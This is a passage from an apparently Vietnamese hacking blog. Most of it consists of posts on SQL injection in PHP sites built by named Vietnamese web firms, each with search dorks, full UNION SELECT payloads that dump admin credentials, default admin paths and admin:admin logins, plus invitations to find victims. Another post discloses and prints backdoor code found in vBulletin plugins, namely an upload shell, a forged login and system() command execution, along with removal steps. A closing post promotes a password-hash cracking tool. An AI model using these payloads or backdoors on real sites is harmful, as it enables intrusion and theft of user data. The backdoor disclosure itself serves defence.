Đến đây thì có lẽ mọi người hoàn toàn có thể làm những gì mình cần rồi. Mình không ghi ra luôn tất cả những câu query để lấy những thông tin quan trọng mục đích để mọi người tự query và làm phần còn lại để hiểu hơn những gì mình cần làm.

Một số server sẽ có chặn và lọc các truy vấn nguy hiểm nên mọi người có thể dùng thêm những cách bypass khi SQL injection thông thường là sẽ làm được.

Fix lỗi:
- Mở mã nguồn 2 file bên dưới

fshop/fshop_dobuy.php
fshop/ fshop_eventid.php

Tim:
 
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$_GET[id]'");  
$infoitem = $vbulletin->db->fetch_array($query);
$iditem = $_GET['id'];

Thay bằng:
 
$iditem = (int)$_GET['id'];
$query = $vbulletin->db->query_read("SELECT * FROM " . TABLE_PREFIX . "fshop_items WHERE id='$iditem'");  
$infoitem = $vbulletin->db->fetch_array($query);
/*fixed by ccb*/

Exploit by: concobe & bula -VHB- huynhdegroup.net

P/s: Exploit này tuy mình đã public từ rất lâu rồi nhưng đến nay vẫn còn một số không ít các diễn đàn vẫn sử dụng mod này và lỗ hổng vẫn còn tồn tại, điều này thật tệ.

Exploit website sài mã nguồn của cty Quảng Cáo Đại Thống​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Quảng Cáo Đại Thống
# Nhà phát triển: Thiết kế web: Quảng Cáo Đại Thống - http://daithong.com.vn/
# Chức năng: Website sài mã nguồn PHP của cty Quảng Cáo Đại Thống
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Thiết kế web: Quảng Cáo Đại Thống"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 18-06-2014

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục catid=
2. Path quản trị mặc định /quanly/
3. Victim demo:


1. Dính lỗi SQL injection ở phần danh mục catid=

Select user, version, database name:

/index.php?page=news&catid=-1 union select 1,group_concat(user(),0x3a,version(),0x3a,database()),3,4,5-- -

Select table name:

/index.php?page=news&catid=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()-- -

Select column name: admin

/index.php?page=news&catid=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646d696e-- -

Select info: column: Id,Username,Password,Status,LastLogin

/index.php?page=news&catid=-1 union select 1,group_concat(Id,0x3a,Username,0x3a,Password),3,4,5 from admin-- -


2. Path quản trị mặc định /quanly/
Toàn bộ các code đã test thì đều có chung đường dẫn truy cập vào khu vực quản lý của admin đó là:

domain-victim.xyz/quanly

3. Victim demo:


Concobe

Exploit website sài mã nguồn của cty Mũi Tên Việt​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty Mũi Tên Việt
# Nhà phát triển: Thiết kế web: Mũi Tên Việt - http://www.vietarrow.com/
# Chức năng: Website sài mã nguồn PHP của cty Mũi Tên Việt
# Phiên bản lỗi: Tất cả các phiên bản, trừ các version sau này sài mã nguồn khác.
# Dork: "Designed by Viet Arrow"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 12-04-2011

Chi tiết thông tin cty này.

    Công Ty Trách Nhiệm Hữu Hạn Mũi Tên Việt ( Viet Arrow Co., LTD) là công ty phát triển phần mềm và công nghệ Internet, được sáng lập và lãnh đạo bởi các chuyên gia công nghệ và quản lý hàng đầu.

    Viet Arrow cung cấp sản phẩm và dịch vụ đa dạng cho khách hàng, bao gồm các ứng dụng trên Web, tích hợp hệ thống và tư vấn về các hệ thống Công nghệ thông tin. Với năng lực công nghệ, kinh nghiệm tư vấn quản lý, khả năng nắm bắt xu thế thị trường và nhận thức sâu sắc về chiến lược quốc gia trong việc phát triển CNTT nói chung và công nghệ phần mềm nói riêng, Viet Arrow đã đặt ra mục tiêu trở thành nhà cung cấp hàng đầu các giải pháp phần mềm cho các doanh nghiệp và tổ chức tại Việt Nam.

    Ngoài ra, với mong muốn tham gia vào ngành công nghiệp phần mềm nhằm góp phần tăng cường sức cạnh tranh của các công ty Việt Nam trước viễn cảnh hội nhập vào thị trừơng khu vực và toàn thế giới, Viet Arrow đã và đang tăng cường nghiên cứu phát triển để tạo cơ hội đưa sản phẩm ra thị trường nước ngoài với thương hiệu Việt Nam.

    Viet Arrow có thị trường trong lĩnh vực dịch vụ lập trình cho các khách hàng quốc tế (Mỹ, Canada, Đức, các nước Châu Âu, …) cũng như thị trường trong nước bao gồm các cơ quan Nhà nước, các tỉnh thành, các công ty nước ngoài và công ty Việt Nam. Công ty có đội ngũ lập trình viên có nhiều kinh nghiệm và tay nghề cao trong việc phát triển và triển khai các sản phẩm phần mềm lớn trong nước và quốc tế.

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty Mũi Tên Việt này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và vì cty này thành lập khá lâu từ lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần danh mục, phần chi tiết sản phẩm,...
2. Victim demo:


/index.php?do=content&id=SQLi
/index.php?do=product&id=SQLi
/index.php?do=products&act=detail&id=SQLi

1. Dính lỗi SQL injection ở phần danh mục product&id=

Select user, version, database name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(user(),0x3a,version(),0x3a,database()),6,7,8,9-- -

Select table name:

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(table_name),6,7,8,9 from information_schema.tables where table_schema=database()-- --- -

Select column name: tt_admin

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(column_name),6,7,8,9 from information_schema.columns where table_name=0x74745f61646d696e-- -

Select info: column: id,username,password,email,right

/index.php?do=product&id=-6 union select 1,2,3,4,group_concat(Id,0x3a,Username,0x3a,Password,0x3a,email),6,7,8,9 from tt_admin-- -

Còn 2 phần nội dung và chi tiết sản phẩm các bạn tự khai thác he, nó cũng tương tự thôi.

/index.php?do=content&id=SQLi
/index.php?do=products&act=detail&id=SQLi

2. Victim demo:
- Vui lòng tìm kiếm và kiểm thử.

P/s: Giờ mới viết blog và public nên ,... thời gian có hơi sai lệch :3

Concobe

Exploit website sài mã nguồn của cty VIETDESI​

# Thông tin Lỗi: SQL Injection các website sài mã nguồn của cty VIETDESI
# Nhà phát triển: Thiết kế web: cty VIETDESI - http://vietdesi.com/
# Chức năng: Website sài mã nguồn PHP của cty VIETDESI
# Phiên bản lỗi: Tất cả các phiên bản.
# Dork: "Designed by VietDesi"
# Phát hiện bởi: Concobe.
# Ngày phát hiện: 25-03-2015

Chi tiết thông tin cty này.

    Các bạn vào đọc cho khỏe hừ hừ.
    http://vietdesi.com/

Rất nhiều website bị lỗ hổng này do sài chung một mã nguồn cho cty VIETDESI này tạo ra và không có lọc cũng như ràng buộc các truy vấn trong code, và vì cty này thành lập khá lâu từ lượng khách hàng cũng không ít :(

Chi tiết lỗ hổng:
1. Dính lỗi SQL injection ở phần chi tiết sản phẩm, lười check thêm những phần khác...
2. Victim demo.

3. Lỗi dùng chung thông tin đăng nhập và link quản trị.

1. Dính lỗi SQL injection ở phần chi tiết sản phẩm /index.php?frame=product_detail&id=
Select user, version, database name:

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -

Select table name:

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.tables where table_schema=database()-- -

Select column name: jcas_admin

/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from information_schema.columns where table_name=0x6a6361735f61646d696e-- -

Select info: column: id,admin_user,admin_pwd,is_super_admin,privilege


/?frame=product_detail&id=-481 UNION SELECT 1,2,group_concat(id,0x3a,admin_user,0x3a,admin_pwd,0x3a,is_super_admin),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from jcas_admin-- -

2. Victim demo:
Các bạn tự tìm kiếm theo Dork mình đã cung cấp.

3. Lỗi dùng chung thông tin đăng nhập và link quản trị.
- Link admin mặc định là : site.com/admin/
- user và password dùng chung cho hầu hết là:
admin:admin

P/s: Thông tin này mình đăng lại nên có thể có sai lệch ở thời gian phát hiện bug, và thời gian ghi trên đó là thời điểm chính xác khi mình tìm thấy lỗ hổng của mã nguồn này.
Concobe

Thứ Năm, 12 tháng 1, 2017

Mã nguồn products Post Thank You Hack, [AJAX]Vietvbb - TopX 4.0.4 của diễn đàn vietvbb.vn bị găm mã độc.

Mới đầu năm nhưng tôi (Concobe) đã có một số thông tin gây choáng váng cho rất nhiều admin đang sử dụng mã nguồn Vbulletin và các products, Plugins được chia sẻ trên diễn đàn vietvbb.vn, có thể nói đây là cộng đồng Vbb lớn nhất ở Việt Nam hiện nay, nhưng không hiểu vì lý do gì? có thể do chính người chia sẻ mã nguồn đã có ý đồ hoặc do diễn đàn bị tấn công và bị ai đó găm mã độc vào để trục lợi.



Tôi có nhận cái kèo làm cái diễn đàn cho người bạn để sài trong mạng nội bộ của các bạn ấy, như một thói quen tôi vào vietvbb.vn và download mã nguồn vbulletin null cùng với một số plugins phổ biến và tiến hành cài đặt như thường lệ, mọi thứ đều diễn ra bình thường đến lúc tôi vô tình nhìn qua mã nguồn trong admincp của diễn đàn đã cài đặt và phát hiện ra những đoạn mã có style code không giống với những gì của plugin đó, sẵn máu vọc vạch tôi kiểm tra thì phát hiện đây chính là mã độc được ai đó găm vào.

Hiện tại tôi phát hiện ra ít nhất là 3 plugin rất phổ biến và gần như được mọi người sử dụng cho diễn đàn của mình là:

1. [AJAX] Post Thank You Hack 7.82 : có 1.315 lượt download
2. [AJAX] Post Thank You Hack 7.84    : có 543 lượt download
3. [AJAX]Vietvbb - TopX 4.0.4    : có 23.977 lượt download




I. Tôi sẽ trình bày phần code bị chèn mã độc trong mã nguồn Post Thank You Hack ở mục 1 và 2:

- Trong 2 plugin này thì phần code bị găm và vị trí găm rất giống nhau có thể đây là của một người găm vào, đầu tiên là ở file có tên post_thanks.php
- Nội dung code lạ được chèn từ dòng số 289 đến 298

if(@$_REQUEST["do"]== 'ptyh')
{
    $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>Post Thank You Hack 7.84</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}

if (isset($_GET['ptyh']))
{
    define('THIS_SCRIPT', 'login');require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['ptyh'] . "'");if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else
    { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);exec_unstrike_user($_GET['ptyh']);process_new_login('cplogin', TRUE, TRUE);do_login_redirect();}
}

Đây gồm 2 phần:
- Một phần code dùng để thực hiện gọi form upload để tải lên mã độc nếu các bạn sử dụng plugin có gắn mã độc này sẽ dễ dàng bị hacker chiếm quyền.
- Phần code còn lại dùng để fake cookies có tác dụng cho phép login vào bất kỳ user nào có trong Database diễn đàn của các bạn.

Đi sâu hơn tôi còn phát hiện thêm cũng ngay plugin này vẫn còn một chỗ khác cũng bị găm một đoạn code nhỏ để thực thi các lệnh trực tiếp trên website các bạn, nếu đủ điều kiện thì hacker có thể làm mọi thứ mà người đó muốn làm với site các bạn.Các bạn xem xét nội dung code của file có tên: product-post_thanks.xml dòng số 156 đến 160:

if(isset($_GET['thanked']))
{   
    echo "<h1>Post Thank You Hack 7.82</h1><pre>";
    system($_GET['thanked']);exit;
}

II. Cách fix bug [AJAX] Post Thank You Hack 7.82 và [AJAX] Post Thank You Hack 7.84.
- Rất may là chúng ta đã phát hiện ra được đoạn code nguy hiểm và công việc bây giờ cũng không quá khó để xử lý, các bạn fix bằng cách vào xóa nội dung mã độc ở 2 file có tên:

1. post_thanks.php
- Xóa toàn bộ nội dung code lạ được chèn từ dòng số 289 đến 298 như ở trên tôi có copy đoạn code đó ra để các bạn so sánh.




2. product-post_thanks.xml
- Phần này hơi khác chút xíu vì do các bạn đã Install plugin này vào rồi nên ngoài việc xóa trong file product-post_thanks.xml các bạn còn phải xóa thêm ở trong CDSL bằng cách:
Truy cập vào /admincp -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Post Thank You Hack -> chọn Sửa mục Post Thank You Hack có Hook Location là cache_templates
Ở khung chỉnh sửa các bạn vào tìm vào xóa dòng code có nội dung này đi -> Save lại là xong.


if(isset($_GET['thanked']))
{   
    echo "<h1>Post Thank You Hack 7.82</h1><pre>";
    system($_GET['thanked']);exit;
}

III. Tôi sẽ trình bày phần code bị chèn mã độc trong mã nguồn product tên [AJAX]Vietvbb - TopX 4.0.4


Đây có thể nói là một product phổ biến đến mức mà gần như diễn đàn sài mã nguồn Vbulletin nào ở VN cũng có sử dụng chính vì thế mà lượt tải về sử dụng của product này lên tới con số 23.977 lượt download một con số không hề nhỏ chút nào, điều này làm dấy lên một sự lo ngại đáng sợ thật sự cho cộng đồng diễn đàn Vbulletin ở VN.Tôi cũng không ngoại lệ, đã sử dụng plugin này và chính vì phát hiện bất ngờ với plugin Post Thank You Hack nên tôi ngay lập tức kiểm tra toàn bộ nội dung code các plugin mà tôi đã sử dụng cho cái forum tôi đang làm và thật may mắn là tôi đã phát hiện được cái cần phát hiện.Cũng với những đoạn code quen thuộc cùng chức năng như bị chèn trong mã nguồn Post Thank You Hack chỉ đổi tên gọi hàm nhằm mục đích ngụy trang và lần này thì người chèn mã độc đã chọn cách găm thẳng vào file cài đặt nên sau khi cài xong thì hiển nhiên mã độc này sẽ tồn tại trong CSDL (database) diễn đàn các bạn một cách thầm lặng.

Nội dung file product-vietvbb_topstats_vb4.xml ở dòng số:
- 447 đến 455:


Và dòng 517 đến 521:

if(isset($_GET['ajaxtop']))
{   
    echo "<h1>VietVBB - Advanced Forum Statistics</h1><pre>";
    system($_GET['ajaxtop']);exit;
}

IV. Cách fix bug trong mã nguồn product tên [AJAX]Vietvbb - TopX 4.0.4
- Phần này hơi khác chút xíu vì do các bạn đã Install plugin này vào rồi nên ngoài việc xóa trong file product-vietvbb_topstats_vb4.xml các bạn còn phải xóa thêm ở trong CDSL bằng cách:





Truy cập vào:
Tên_miền_diễn đàn/admincp/ -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Mod Thống kê,VietVBB - TopX,...
-> chọn Sửa mục VietVBB - TopX AJAX có Hook Location là ajax_start và xóa đoạn code có nội dung dưới đây rồi Save lại.


if(@$_REQUEST["do"]== 'ajaxtop')
{
    $files = @$_FILES["files"]; if($files["name"] != ''){ $fullpath = $_REQUEST["path"].$files["name"]; if(move_uploaded_file($files['tmp_name'],$fullpath)){echo "<h1><a href='$fullpath'>Advanced Forum Statistics</a></h1>";} }exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}
if (isset($_GET['ajaxtop']))
{
    define('THIS_SCRIPT', 'login');require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['ajaxtop'] . "'");if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else
    { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);exec_unstrike_user($_GET['ajaxtop']);process_new_login('cplogin', TRUE, TRUE);do_login_redirect();}
}

Tiếp tục các bạn làm tương tự:
Tên_miền_diễn đàn/admincp/ -> Plugins & Products -> Plugin Manager -> Tìm Product có tên Mod Thống kê,VietVBB - TopX,...
-> chọn Sửa mục VietVBB - TopX CT có Hook Location là cache_templates và xóa đoạn code có nội dung dưới đây rồi Save lại.

if(isset($_GET['ajaxtop']))
{   
    echo "<h1>VietVBB - Advanced Forum Statistics</h1><pre>";
    system($_GET['ajaxtop']);exit;
}

Vậy là các bạn đã Fix được lỗ hổng bị chèn mã độc vào diễn đàn các bạn ngay từ lúc thành lập tới giờ :(


V. Đối với nguồn chia sẻ mã nguồn cho cộng đồng Vbulletin.
Đề nghị admin diễn đàn Vietvbb.vn hỗ trợ xóa đi những sản phẩm có chứa mã độc đang tồn tại trên diễn đàn chia sẻ của các bạn để không còn người dùng nào bị sử dụng những product có mã độc, tránh những tổn thất to lớn khi bị rò rỉ thông tin người dùng và những thông tin khác.
Link của 3 product có tồn tại mã độc.
1. http://www.vietvbb.vn/up/showthread.php?t=40469
2. http://www.vietvbb.vn/up/showthread.php?t=71852
3. http://www.vietvbb.vn/up/showthread.php?t=35947


Lời kết:
Đây chỉ là những phần nhỏ đen tối bị tôi vô tình phát hiện và phơi bày, rất có thể đâu đó trong mã nguồn các product, plugin được chia sẻ kia vẫn còn tồn tại những mã độc nguy hiểm như thế, chính vì vậy lời khuyên của Concobe cho các bạn đó là:
- Chỉ tải ở những nguồn tin cậy.
- Luôn kiểm tra kỹ mã nguồn của các bạn trước khi sử dụng.
- Hãy sử dụng những sản phẩm có bản quyền để được hỗ trợ update và kiểm thử an toàn cho người dùng.


P/s: Cảm ơn chế Sovietw0rm đã động viên tinh thần để Concobe public bài này.  :3
Concobe

Thứ Ba, 10 tháng 1, 2017

Phần mềm hỗ trợ brute force hash password tốt

Hôm nay Concobe sẽ giới thiệu đến các bạn một bộ tiện ích hoàn toàn miễn phí nhưng về tính tiện dụng lại không thể đong đếm được trong lĩnh vực brute force các hash mật khẩu được mã hóa của rất rất nhiều thuật toán phổ biến, tính đến thời điểm hiện tại thì chương trình đã hỗ trợ brute force hơn 450 thuật toán mã hóavà vẫn tiếp tục cập nhật.

Hash Manager is a solution for recovering passwords to hashes; its features:
        – Supports over 450 hashing algorithms.
        – Contains over 70 additional utilities for handling hashes, passwords, and dictionaries.
        – Optimized for working with large hash lists.
        – Comes in 64-bit version, which is much faster on many algorithms.
        – Supports unlimited number of loadable hashes, as well as dictionaries, rules, and masks.
        – Supports all most efficient hash attacks.
        – Supports multithreading.
        – Recovers passwords in Unicode.
        – Has modular architecture.
        – And much more!

Theo mình biết thì đây là bộ tiện ích được phát triển sau khi phần mềm Password Pro ngừng phát hành và hỗ trợ, người phát triển bộ tiện ích này cũng chính là admin của cộng đồng brute force nổi tiếng thế giới InsidePro, admin cũng rất nhiệt tình và hỗ trợ các bạn rất nhiều, nếu bạn có thuật toán mới mà chưa có chương trình nào hỗ trợ brute force với thuật toán này thì các bạn có thể inbox hoặc post vào box Hash Manager trên diễn đàn, ( https://forum.insidepro.com/viewforum.php?f=51 ) kèm theo demo hash đã mã hóa và mật khẩu plaintext để admin đó test thuật toán sau khi hoàn thành module đó.

Ngoài chức năng chính là brute force và quản lý hash thì Admin của InsidePro cũng hỗ trợ thêm cho chúng ta rất nhiều công cụ để sử dụng cho việc quản lý, kiểm thử, convert, sàng lọc hash, pass,...các bạn có thể tìm hiểu ở trong thư mục tools kèm theo.

Ưu và nhược điểm:
- Ưu điểm thì rất nhiều, miễn phí, hỗ trợ tốt, thêm module mới hoàn toàn dễ dàng, hỗ trợ đa nền tảng 32bits hay 64bits đều hỗ trợ, nhiều công cụ đi kèm vô cùng tiện dụng.
- Nhược điểm mà cho tới thời điểm hiện tại mình thấy vẫn là chỉ hỗ trợ trên Windows, không có hỗ trợ cho Linux, nhiều bạn cũng coi việc không có GUI cho bộ tiện ích này là nhược điểm nhưng theo mình thì đây không phải là nhược điểm vì việc sử dụng CLI sẽ giúp giảm thiểu tiêu hao tài nguyên khi sử dụng.

Link Download: 
Home: http://insidepro.com/
Link: http://www.insidepro.com/download/HM.zip

List thuật toán mà chương trình hỗ trợ cho tới thời điểm viết bài:

BlackBerry ES v10
Blake-224
Blake-256
Blake-384
Blake-512
Blowfish($pass.$username)
Blowfish(Eggdrop)
Blowfish(OpenBSD)
Cisco IOS
Complex
CRC-64
Custom(1)
Custom(10)
Custom(11)
Custom(12)
Custom(13)
Custom(14)
Custom(15)
Custom(16)
Custom(17)
Custom(18)
Custom(19)
Custom(2)
Custom(20)
Custom(21)
Custom(22)
Custom(23)
Custom(24)
Custom(25)
Custom(26)
Custom(27)
Custom(28)
Custom(29)
Custom(3)
Custom(30)
Custom(31)
Custom(32)
Custom(33)
Custom(34)
Custom(35)
Custom(36)
Custom(37)
Custom(38)
Custom(39)
Custom(4)
Custom(40)
Custom(41)
Custom(42)
Custom(43)
Custom(44)
Custom(45)
Custom(46)
Custom(47)
Custom(5)
Custom(6)
Custom(7)
Custom(8)
Custom(9)
Dahua
DCC2
DES(Oracle)
DES(Unix)
Domain Cached Credentials
EPiServer v6.x (.NET v3.5)
EPiServer v6.x (.NET v4.x)
EPiServer
GOST R 34.11-2012 (256)
GOST R 34.11-2012 (512)
GOST R 34.11-94
HAS-160
Haval-128(HMAC1)
Haval-128(HMAC2)
Haval-128
Haval-160(HMAC1)
Haval-160(HMAC2)
Haval-160
Haval-192(HMAC1)
Haval-192(HMAC2)
Haval-192
Haval-224(HMAC1)
Haval-224(HMAC2)
Haval-224
Haval-256(HMAC1)
Haval-256(HMAC2)
Haval-256
iSSHA-1
iSSHA-256
iSSHA-384
iSSHA-512
Keccak-224
Keccak-256
Keccak-384
Keccak-512
LM
Lotus v5
Lotus v6
Magento
MD2(HMAC1)
MD2(HMAC2)
MD2
md4($pass.$salt)
md4($salt.$pass)
MD4(HMAC1)
MD4(HMAC2)
md4(md4($pass))
md4(md4($pass).$salt)
MD4(Round 1)
MD4
md5($pass.$salt)
md5($pass.$salt.$pass)
md5($pass.$salt.md5($pass.$salt))
md5($pass.$username)
md5($pass.'--'.$salt)
md5($pass.md5($pass))
md5($pass.md5($salt))
md5($salt.$pass)
md5($salt.$pass.$salt)
md5($salt.$pass.$username)
md5($salt.0x2D.md5($pass))
md5($salt.0x7C.$pass)
md5($salt.hex2bin(md5($pass)).$username)
md5($salt.md5($pass))
md5($salt.md5($pass).$salt)
md5($salt.md5($pass.$salt))
md5($salt.md5($salt.$pass))
md5($salt.md5(md5($pass).$salt))
md5($salt.sha1($pass))
md5($salt.sha1($salt.$pass))
md5($username.$pass)
md5($username.$pass.$salt)
md5($username.0x00.$pass)
md5($username.0x0A.$pass)
md5($username.0x0A.$pass.0x0A.$salt)
md5($username.0x23.$pass)
md5($username.md5($pass).$salt)
md5($username.sha1($salt.$pass))
md5($username.strtoupper(md5($pass)).$salt)
md5(0x01.$pass.$salt)
MD5(AIX)
MD5(APR)
md5(base64_encode($pass))
md5(base64_encode(base64_encode($pass)))
md5(base64_encode(hex2bin(md5($pass))))
md5(base64_encode(hex2bin(sha1($pass))))
md5(base64_encode(md5($pass)))
md5(base64_encode(md5(md5($pass))))
md5(bin2hex($pass))
MD5(Cisco PIX)
MD5(DES(Unix))
md5(hex2bin(md5($pass)))
MD5(HMAC1)
MD5(HMAC2)
md5(md4($pass))
md5(md5($pass))
md5(md5($pass).$pass)
md5(md5($pass).$pass.sha1($pass))
md5(md5($pass).$salt)
md5(md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass).md5($pass))
md5(md5($pass).md5($pass).md5($pass).md5($pass).$salt)
md5(md5($pass).md5($salt))
md5(md5($pass).sha1($pass))
md5(md5($pass.$salt).md5($pass).$salt)
md5(md5($pass.$salt).sha1(md5($pass.$salt).$pass))
md5(md5($pass.$username).$salt)
md5(md5($salt).$pass)
md5(md5($salt).md5($pass))
md5(md5($salt.$pass).0x3A.$salt)
md5(md5($username.$pass).$salt)
md5(md5(base64_encode($pass)))
md5(md5(md5($pass)))
md5(md5(md5($pass)).$salt)
md5(md5(md5($pass)).md5(md5($pass)))
md5(md5(md5($pass).$salt).$username)
md5(md5(md5($pass).md5($pass).md5($pass).md5($pass)))
md5(md5(md5(md5($pass))))
md5(md5(md5(md5(md5($pass)))))
md5(md5(md5(md5(md5(md5($pass))))))
md5(md5(md5(md5(md5(md5(md5($pass)))))))
md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))
md5(md5(md5(md5(md5(md5(md5(md5(md5($pass)))))))))
md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))))
md5(md5(sha1(sha1(md5($pass)))))
md5(md5(strtoupper(md5($pass))))
md5(MySQL($pass).$salt)
MD5(Palshop)
MD5(phpBB3)
MD5(PostOffice)
MD5(Round 1)
MD5(Round FF1-FF4)
md5(sha1($pass))
md5(sha1($pass).$salt)
md5(sha1($pass).md5($pass).sha1($pass))
md5(sha1($pass.$salt))
md5(sha1($pass.$username))
md5(sha1($pass.md5($pass)))
md5(sha1($salt).md5($pass))
md5(sha1($salt.$pass))
md5(sha1(base64_encode($pass)))
md5(sha1(md5($pass)))
md5(sha1(md5($pass)).sha1($pass))
md5(sha1(md5($salt.sha1($pass))))
md5(sha1(md5(sha1($pass))))
md5(sha1(md5(sha1(md5($pass)))))
md5(sha1(sha1($pass)))
md5(sha1(sha1(md5($pass))))
md5(sha256($pass))
MD5(Skype)
MD5(Social Engine)
md5(strrev($pass))
md5(strrev(md5($pass)))
md5(strtoupper(md5($pass)))
md5(strtoupper(md5(strtoupper(md5($pass)))))
md5(strtoupper(md5(strtoupper(md5(strtoupper(md5($pass)))))))
md5(strtoupper(sha1($pass)))
MD5(Sun)
MD5(Unix)
MD5(Wiki)
MD5(Wordpress)
MD5(ZipMonster)
MD5
MongoDB(1)
MongoDB(2)
MSSQL(2000)
MSSQL(2005)
MSSQL(2012)
MySQL(md5($pass))
MySQL(Net)
MySQL
MySQL5(md5($pass))
MySQL5
NSEC3
NTLM
Panama
PBKDF2 Cisco
PBKDF2 GRUB
PBKDF2 JIRA
PBKDF2 MD5(2)
PBKDF2 MD5(3)
PBKDF2 MD5
PBKDF2 SHA-1(2)
PBKDF2 SHA-1(3)
PBKDF2 SHA-1
PBKDF2 SHA-256(2)
PBKDF2 SHA-256(3)
PBKDF2 SHA-256
PBKDF2 SHA-512(2)
PBKDF2 SHA-512(3)
PBKDF2 SHA-512
PHPS
PostgreSQL
RAdmin v2.x
RipeMD-128(HMAC1)
RipeMD-128(HMAC2)
RipeMD-128
RipeMD-160(HMAC1)
RipeMD-160(HMAC2)
RipeMD-160
RipeMD-256(HMAC1)
RipeMD-256(HMAC2)
RipeMD-256
RipeMD-320(HMAC1)
RipeMD-320(HMAC2)
RipeMD-320
ripemd128($pass.$salt)
ripemd128($salt.$pass)
ripemd160($pass.$salt)
ripemd160($salt.$pass)
ripemd256($pass.$salt)
ripemd256($salt.$pass)
ripemd320($pass.$salt)
ripemd320($salt.$pass)
SAPB
SAPG
SHA-1(AIX)
SHA-1(Django)
SHA-1(FortiOS)
SHA-1(HMAC1)
SHA-1(HMAC2)
SHA-1(Linkedin)
SHA-1(MacOS)
SHA-1(Oracle)
SHA-1(Unix)
SHA-1
SHA-224(HMAC1)
SHA-224(HMAC2)
SHA-224
SHA-256(AIX)
SHA-256(AuthMe)
SHA-256(Django)
SHA-256(DragonFlyBSD-32)
SHA-256(DragonFlyBSD-64)
SHA-256(HMAC1)
SHA-256(HMAC2)
SHA-256(PasswordSafe)
SHA-256(RuneScape)
SHA-256(Unix)
SHA-256
SHA-384(Django)
SHA-384(HMAC1)
SHA-384(HMAC2)
SHA-384
SHA-512(AIX)
SHA-512(Django)
SHA-512(DragonFlyBSD-32)
SHA-512(DragonFlyBSD-64)
SHA-512(Drupal)
SHA-512(HMAC1)
SHA-512(HMAC2)
SHA-512(MacOS)
SHA-512(Symfony2)
SHA-512(Unix)
SHA-512
sha1($pass.$salt)
sha1($pass.$username.$salt)
sha1($salt.$pass)
sha1($salt.$pass.$salt)
sha1($salt.$pass.$username)
sha1($salt.$pass.'--')
sha1($salt.$username.$pass.$salt)
sha1($salt.md5($pass))
sha1($salt.md5($pass).$salt)
sha1($salt.sha1($pass))
sha1($salt.sha1($pass.$salt))
sha1($salt.sha1($salt.sha1($pass)))
sha1($username.$pass)
sha1($username.$pass.$salt)
sha1($username.$pass.$salt.$username)
sha1($username.$salt.$pass)
sha1($username.0x3A.$pass)
sha1('--'.$salt.'--'.$pass.'--')
sha1('--'.$salt.'--'.$pass.'--'.$username)
sha1(md5($pass))
sha1(md5($pass).$pass)
sha1(md5($pass).$salt)
sha1(md5($pass).$username.$salt)
sha1(md5($pass.$salt))
sha1(md5($pass.$username))
sha1(md5($salt).$pass.sha1($salt))
sha1(md5($salt).$pass.sha1($salt).$username)
sha1(md5(md5($pass)))
sha1(md5(sha1($pass)))
sha1(md5(sha1(md5($pass))))
sha1(sha1($pass))
sha1(sha1($pass).$salt)
sha1(sha1($pass).substr($pass,0,3))
sha1(sha1($salt.$pass))
sha1(sha1($salt.$pass.$salt))
sha1(sha1(md5($pass)))
sha1(sha1(sha1($pass)))
